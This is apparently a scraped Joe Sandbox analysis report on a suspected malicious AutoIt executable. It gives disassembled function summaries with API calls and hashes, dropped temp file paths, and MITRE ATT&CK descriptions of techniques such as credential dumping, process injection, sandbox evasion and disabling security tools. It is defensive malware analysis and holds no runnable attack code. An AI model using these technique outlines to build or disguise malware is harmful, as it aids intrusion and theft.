__calloc_crt.LIBCMT ref: 00244DB7

Strings

"., xrefs: 00244DCE

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: __calloc_crt
String ID: ".
API String ID: 3494438863-2673205107
Opcode ID: 420c3b728ee6058dbe876f65cdd140c020c24decd739d242ad3f25c0baa48e89
Instruction ID: 2aad3a0783ac474fe485487bdaa419006f143f2f3e9821fa56fade1301251a83
Opcode Fuzzy Hash: 420c3b728ee6058dbe876f65cdd140c020c24decd739d242ad3f25c0baa48e89
Instruction Fuzzy Hash: 55F0FC71779602DAE71CAF29BC95BA667D8F705720F10451BF701CE284E7B0C8514B95

Function 00224024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

LoadImageW.USER32(00220000,00000063,00000001,00000010,00000010,00000000), ref: 00224048
EnumResourceNamesW.KERNEL32(00000000,0000000E,002667E9,00000063,00000000,76950280,?,?,00223EE1,?,?,000000FF), ref: 002941B3

Strings

>", xrefs: 00224028

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: EnumImageLoadNamesResource
String ID: >"
API String ID: 1578290342-1888800261
Opcode ID: 45eed3ced881d77650e7593b431f4bf567c4350770a913795332b74d88567165
Instruction ID: bb929f6f592ef829a3b958c9cb17ade8a3517a99a75fec415eb4a33af3ceadcb
Opcode Fuzzy Hash: 45eed3ced881d77650e7593b431f4bf567c4350770a913795332b74d88567165
Instruction Fuzzy Hash: 61F09631690351B7D6305F16FC8EFD63B59D749BB5F100516F615AE1D0D2F094E08690

Function 00267744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00267762
_wcscmp.LIBCMT ref: 00267774

Strings

#32770, xrefs: 0026776E

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 69517cd295838b636f1a9c420fc6089ecf8f38fcc77216b6718ce043506d8372
Instruction ID: feacea9beedeadb697d967674c445c734e8c225fcbf65f502b8791c200eac1ac
Opcode Fuzzy Hash: 69517cd295838b636f1a9c420fc6089ecf8f38fcc77216b6718ce043506d8372
Instruction Fuzzy Hash: 46E09277A0432527D710EBA5EC49E97FBACAB51B64F000066B905D3181E670EA518BD4

Function 0025A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0025A63F

Part of subcall function 002413F1: _doexit.LIBCMT ref: 002413FB

Strings

Error allocating memory., xrefs: 0025A638
AutoIt, xrefs: 0025A633

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: f840405543cbcdc7c67c0851f7f362617d8c4ed6a7571b44fd43665d7250c03d
Instruction ID: 0eaeaab5f8cc8f7b73a89d159308e8631a5f48f0ffed20e673af6910c15ea368
Opcode Fuzzy Hash: f840405543cbcdc7c67c0851f7f362617d8c4ed6a7571b44fd43665d7250c03d
Instruction Fuzzy Hash: BAD02B313E032833C2143AE83C1BFC8354C8B16B91F040022BB0D965C24DE2C9B005DD

Function 0029AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 0029ACC0
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0029AEBD

Strings

WIN_XPe, xrefs: 0029ACD3

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: 2fcc7f49f918d6aa912311dfa7261c502643f674e62324e13d99bb17ec91e773
Instruction ID: 3db312c7ef49b48583f30f1a78a65a2644b8a20837fadf9d780dcb4311f0a98d
Opcode Fuzzy Hash: 2fcc7f49f918d6aa912311dfa7261c502643f674e62324e13d99bb17ec91e773
Instruction Fuzzy Hash: 81E06570C20209DFCF11DFA4E948AECB7B8AB58300F108082E007B6570CB704A54DF21

Function 00288698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002886A2
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 002886B5

Part of subcall function 00267A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00267AD0

Strings

Shell_TrayWnd, xrefs: 0028869B

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 3682734cc78ab29c4d9b5bd601b4c7dbe398285d37072a406236719daa377eab
Instruction ID: f3dc35c38cbeb39839d9ad30c57d3e322a10aefb6fe305a58776ebba67b19ffa
Opcode Fuzzy Hash: 3682734cc78ab29c4d9b5bd601b4c7dbe398285d37072a406236719daa377eab
Instruction Fuzzy Hash: 1ED0C9317A4314A7E268A770BC4FFC66A589B05B11F500815B64AAA1D0C9A0AD508A54

Function 002886CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002886E2
PostMessageW.USER32(00000000), ref: 002886E9

Part of subcall function 00267A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00267AD0

Strings

Shell_TrayWnd, xrefs: 002886DB

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: f90c91b20b0117b824e48682b56bbe139be24af3e5b36e625376524995428365
Instruction ID: 26aa682337400a39872904f278b041f715e2dfa8c62475e08bd36357b33b9553
Opcode Fuzzy Hash: f90c91b20b0117b824e48682b56bbe139be24af3e5b36e625376524995428365
Instruction Fuzzy Hash: B5D0C931795314ABF268A770BC4FFC66A589B0AB11F500815B646AA1D0C9A0AD508A55

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report WDpjhC3jpq.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\122-fVJ8

C:\Users\user\AppData\Local\Temp\aut912D.tmp

C:\Users\user\AppData\Local\Temp\extrorsal

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
WDpjhC3jpq.exe

Function 0024B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Function 00223D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151
windowCOMMON

Function 0023DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Function 0022406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 0026FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238
COMMON

Function 0026BFA4 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 316
fileCOMMON

Function 00223F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 00223742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00223E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Function 0024ACB3 Relevance: 15.2, APIs: 10, Instructions: 219
COMMON

Function 018771A0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 002249FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Function 002236B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre